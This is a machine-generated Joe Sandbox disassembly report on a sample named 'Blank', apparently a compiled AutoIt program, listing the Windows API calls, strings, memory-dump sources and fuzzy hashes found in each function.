                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 002CCDD0
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002CCE24
                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002CCE49
                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002CCE60
                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 002CCE87
                                                                                                                                    • __swprintf.LIBCMT ref: 002CCED3
                                                                                                                                    • __swprintf.LIBCMT ref: 002CCF16
                                                                                                                                      • Part of subcall function 00271A36: _memmove.LIBCMT ref: 00271A77
                                                                                                                                    • __swprintf.LIBCMT ref: 002CCF6A
                                                                                                                                      • Part of subcall function 002838C8: __woutput_l.LIBCMT ref: 00283921
                                                                                                                                    • __swprintf.LIBCMT ref: 002CCFB8
                                                                                                                                      • Part of subcall function 002838C8: __flsbuf.LIBCMT ref: 00283943
                                                                                                                                      • Part of subcall function 002838C8: __flsbuf.LIBCMT ref: 0028395B
                                                                                                                                    • __swprintf.LIBCMT ref: 002CD007
                                                                                                                                    • __swprintf.LIBCMT ref: 002CD056
                                                                                                                                    • __swprintf.LIBCMT ref: 002CD0A5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                    • API String ID: 3953360268-2428617273
                                                                                                                                    • Opcode ID: 08aef6f7886bf5d3e7b272c41583daf017d69b3af2b138feb779b2f9c6a32f94
                                                                                                                                    • Instruction ID: 32e95a370ff0d8818ceb8515178f6f019a8f7b46e4f59bf815c0189c3bae1c71
                                                                                                                                    • Opcode Fuzzy Hash: 08aef6f7886bf5d3e7b272c41583daf017d69b3af2b138feb779b2f9c6a32f94
                                                                                                                                    • Instruction Fuzzy Hash: 76A14DB1424305ABD710FFA4D885EAFB7ECAF95700F40491DF58982191EB30EA68CB62
                                                                                                                                    Function 002E0EB7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002E0FB3
                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,002F0980,00000000,?,00000000,?,?), ref: 002E1021
                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 002E1069
                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 002E10F2
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 002E1412
                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 002E141F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                    • API String ID: 536824911-966354055
                                                                                                                                    • Opcode ID: 46c0b44bb18f3fcc766dc2b1d1686441b4eb4614c7f571d7292513372ab6a2e3
                                                                                                                                    • Instruction ID: 8274b26da6d7617c2be116839d0098950a2fc2926286f071360bf20e871ee94a
                                                                                                                                    • Opcode Fuzzy Hash: 46c0b44bb18f3fcc766dc2b1d1686441b4eb4614c7f571d7292513372ab6a2e3
                                                                                                                                    • Instruction Fuzzy Hash: 94026A756206519FCB15EF25C881A2AB7E4FF89714B04856CF8899B3A2CB70EC61CF91
                                                                                                                                    Function 002CF735 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 112fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,000BDFBA,?,00000000), ref: 002CF756
                                                                                                                                    • _wcscmp.LIBCMT ref: 002CF76B
                                                                                                                                    • _wcscmp.LIBCMT ref: 002CF782
                                                                                                                                      • Part of subcall function 002C4875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 002C4890
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 002CF7B1
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002CF7BC
                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 002CF7D8
                                                                                                                                    • _wcscmp.LIBCMT ref: 002CF7FF
                                                                                                                                    • _wcscmp.LIBCMT ref: 002CF816
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 002CF828
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(0031B578), ref: 002CF846
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 002CF850
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002CF85D
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002CF86F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                    • String ID: *.*$j,
                                                                                                                                    • API String ID: 1824444939-452294332
                                                                                                                                    • Opcode ID: 621aadcc056767d98e26c1cf07826d0dd3d56125a7290ab7c5a5d1149d78b688
                                                                                                                                    • Instruction ID: d5f3a72b4e010a81a882dcbd68616baab19e0564305141cf6cb9f3a2eb8333d7
                                                                                                                                    • Opcode Fuzzy Hash: 621aadcc056767d98e26c1cf07826d0dd3d56125a7290ab7c5a5d1149d78b688
                                                                                                                                    • Instruction Fuzzy Hash: 6931B57155121A6ADB50AF74ED88FEEB7AD9F09361F100379E804A21A1D770CE65CA60
                                                                                                                                    Function 002B88CD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002B8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002B8E3C
                                                                                                                                      • Part of subcall function 002B8E20: GetLastError.KERNEL32(?,002B8900,?,?,?), ref: 002B8E46
                                                                                                                                      • Part of subcall function 002B8E20: GetProcessHeap.KERNEL32(00000008,?,?,002B8900,?,?,?), ref: 002B8E55
                                                                                                                                      • Part of subcall function 002B8E20: HeapAlloc.KERNEL32(00000000,?,002B8900,?,?,?), ref: 002B8E5C
                                                                                                                                      • Part of subcall function 002B8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002B8E73
                                                                                                                                      • Part of subcall function 002B8EBD: GetProcessHeap.KERNEL32(00000008,002B8916,00000000,00000000,?,002B8916,?), ref: 002B8EC9
                                                                                                                                      • Part of subcall function 002B8EBD: HeapAlloc.KERNEL32(00000000,?,002B8916,?), ref: 002B8ED0
                                                                                                                                      • Part of subcall function 002B8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,002B8916,?), ref: 002B8EE1
                                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002B8931
                                                                                                                                    • _memset.LIBCMT ref: 002B8946
                                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002B8965
                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 002B8976
                                                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 002B89B3
                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002B89CF
                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 002B89EC
                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 002B89FB
                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 002B8A02
                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 002B8A23
                                                                                                                                    • CopySid.ADVAPI32(00000000), ref: 002B8A2A
                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002B8A5B
                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002B8A81
                                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 002B8A95
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3996160137-0
                                                                                                                                    • Opcode ID: 515476cf0d01bea424ee845578f95e16c724237cab97e124daca1138eb11bbf1
                                                                                                                                    • Instruction ID: 641127c9d9550f0548aa6b9d710ee030bfa68e137da96a9b3a655e81fb41b1d1
                                                                                                                                    • Opcode Fuzzy Hash: 515476cf0d01bea424ee845578f95e16c724237cab97e124daca1138eb11bbf1
                                                                                                                                    • Instruction Fuzzy Hash: 16611B7591010ABFDF00DFA5EC85EEEBB79FF04350F04812AE919A6291DB359A15CB60
                                                                                                                                    Function 00275240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0027526C
                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0027527E
                                                                                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 002752E6
                                                                                                                                      • Part of subcall function 00271821: _memmove.LIBCMT ref: 0027185B
                                                                                                                                      • Part of subcall function 0026BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0026BC07
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00275366
                                                                                                                                    • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 002B0B2E
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 002B0B66
                                                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00316D10), ref: 002B0BE9
                                                                                                                                    • ShellExecuteW.SHELL32(00000000), ref: 002B0BF0
                                                                                                                                      • Part of subcall function 0027514C: GetSysColorBrush.USER32(0000000F), ref: 00275156
                                                                                                                                      • Part of subcall function 0027514C: LoadCursorW.USER32(00000000,00007F00), ref: 00275165
                                                                                                                                      • Part of subcall function 0027514C: LoadIconW.USER32(00000063), ref: 0027517C
                                                                                                                                      • Part of subcall function 0027514C: LoadIconW.USER32(000000A4), ref: 0027518E
                                                                                                                                      • Part of subcall function 0027514C: LoadIconW.USER32(000000A2), ref: 002751A0
                                                                                                                                      • Part of subcall function 0027514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 002751C6
                                                                                                                                      • Part of subcall function 0027514C: RegisterClassExW.USER32(?), ref: 0027521C
                                                                                                                                      • Part of subcall function 002750DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00275109
                                                                                                                                      • Part of subcall function 002750DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0027512A
                                                                                                                                      • Part of subcall function 002750DB: ShowWindow.USER32(00000000), ref: 0027513E
                                                                                                                                      • Part of subcall function 002750DB: ShowWindow.USER32(00000000), ref: 00275147
                                                                                                                                      • Part of subcall function 002759D3: _memset.LIBCMT ref: 002759F9
                                                                                                                                      • Part of subcall function 002759D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00275A9E
                                                                                                                                    Strings
                                                                                                                                    • AutoIt, xrefs: 002B0B23
                                                                                                                                    • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 002B0B28
                                                                                                                                    • runas, xrefs: 002B0BE4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                                    • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                    • API String ID: 529118366-2030392706
                                                                                                                                    • Opcode ID: 3720ca982faba1fed450cec99596a144878010efa53ac078afcab98b5d96b134
                                                                                                                                    • Instruction ID: 3af786c0919f292c2d71042a755fc85dbc36a9ac187ff18623f605c178c559d5
                                                                                                                                    • Opcode Fuzzy Hash: 3720ca982faba1fed450cec99596a144878010efa53ac078afcab98b5d96b134
                                                                                                                                    • Instruction Fuzzy Hash: 4F51FC30924359EBCB13EBB4EC46DFDBB78AF09380F1085A9F55562162CAB01566CF21
                                                                                                                                    Function 002E0A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002E147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002E040D,?,?), ref: 002E1491
                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002E0B0C
                                                                                                                                      • Part of subcall function 00264D37: __itow.LIBCMT ref: 00264D62
                                                                                                                                      • Part of subcall function 00264D37: __swprintf.LIBCMT ref: 00264DAC
                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 002E0BAB
                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 002E0C43
                                                                                                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 002E0E82
                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 002E0E8F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1240663315-0
                                                                                                                                    • Opcode ID: e1825428f1082490edc0a013fb0c650f1c16c178d49927746ef910db16336566
                                                                                                                                    • Instruction ID: 9b7765894d0e0aa5b1fe6b2110558f3a6785e2aa70ab6ff28c32e1965a7383e2
                                                                                                                                    • Opcode Fuzzy Hash: e1825428f1082490edc0a013fb0c650f1c16c178d49927746ef910db16336566
                                                                                                                                    • Instruction Fuzzy Hash: 2CE16D31214211AFC714DF29C885E2ABBE8FF89714F44896DF849DB262DA70ED51CF52
                                                                                                                                    Function 002C443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __swprintf.LIBCMT ref: 002C4451
                                                                                                                                    • __swprintf.LIBCMT ref: 002C445E
                                                                                                                                      • Part of subcall function 002838C8: __woutput_l.LIBCMT ref: 00283921
                                                                                                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 002C4488
                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 002C4494
                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 002C44A1
                                                                                                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 002C44C1
                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 002C44D3
                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 002C44E2
                                                                                                                                    • LockResource.KERNEL32(?), ref: 002C44EE
                                                                                                                                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,?,?,00000000), ref: 002C454F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1433390588-0
                                                                                                                                    • Opcode ID: a98694bd36fca8a709d9233d6c1e03dba60742a45a085be6b152a9d104b8289c
                                                                                                                                    • Instruction ID: 246d83e4a2977fcd3345aea0901f8730cd76badb4ff70cc78a75ce114aa63359
                                                                                                                                    • Opcode Fuzzy Hash: a98694bd36fca8a709d9233d6c1e03dba60742a45a085be6b152a9d104b8289c
                                                                                                                                    • Instruction Fuzzy Hash: 7531A171A1121AABDB11AF60EC98FBB7BACFF08381F504529F915D2151D774DA21CB70
                                                                                                                                    Function 002D4830 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1737998785-0
                                                                                                                                    • Opcode ID: 335e26e29fa30f943ea036dbe1d77fab4dff293d0507a8b5e8ac5ae61fb6165e
                                                                                                                                    • Instruction ID: 0ca17c56de57a8a300fb0ba8f574a69e561c04981fd1f68a8bce03ed82975c85
                                                                                                                                    • Opcode Fuzzy Hash: 335e26e29fa30f943ea036dbe1d77fab4dff293d0507a8b5e8ac5ae61fb6165e
                                                                                                                                    • Instruction Fuzzy Hash: 37218031611211AFDB11AF24EC4DB6E77A8EF447A1F00802AF946DB3A2CB70AD21CB54
                                                                                                                                    Function 002C3CE2 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00280284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00272A58,?,00008000), ref: 002802A4
                                                                                                                                      • Part of subcall function 002C4FEC: GetFileAttributesW.KERNEL32(?,002C3BFE), ref: 002C4FED
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 002C3D96
                                                                                                                                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 002C3E3E
                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 002C3E51
                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 002C3E6E
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 002C3E90
                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 002C3EAC
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                                                    • String ID: \*.*
                                                                                                                                    • API String ID: 4002782344-1173974218
                                                                                                                                    • Opcode ID: 9d11acf1e69927e55a1e29b59dcfaf660f2e63f5ba6ff144a5005ea818cf6100
                                                                                                                                    • Instruction ID: 03871346ae03c050ba457d06e1883311955e8a0683f3ea53abd182cb7600735a
                                                                                                                                    • Opcode Fuzzy Hash: 9d11acf1e69927e55a1e29b59dcfaf660f2e63f5ba6ff144a5005ea818cf6100
                                                                                                                                    • Instruction Fuzzy Hash: C651803182110D9ACB15FBE4D992EFDB779AF14300F208269E846B3192DB316F29CF61
                                                                                                                                    Function 002CFA36 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00271A36: _memmove.LIBCMT ref: 00271A77
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 002CFA83
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002CFB96
                                                                                                                                      • Part of subcall function 002652B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002652E6
                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 002CFAB3
                                                                                                                                    • _wcscmp.LIBCMT ref: 002CFAC7
                                                                                                                                    • _wcscmp.LIBCMT ref: 002CFAE2
                                                                                                                                    • FindNextFileW.KERNEL32(?,?), ref: 002CFB80
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
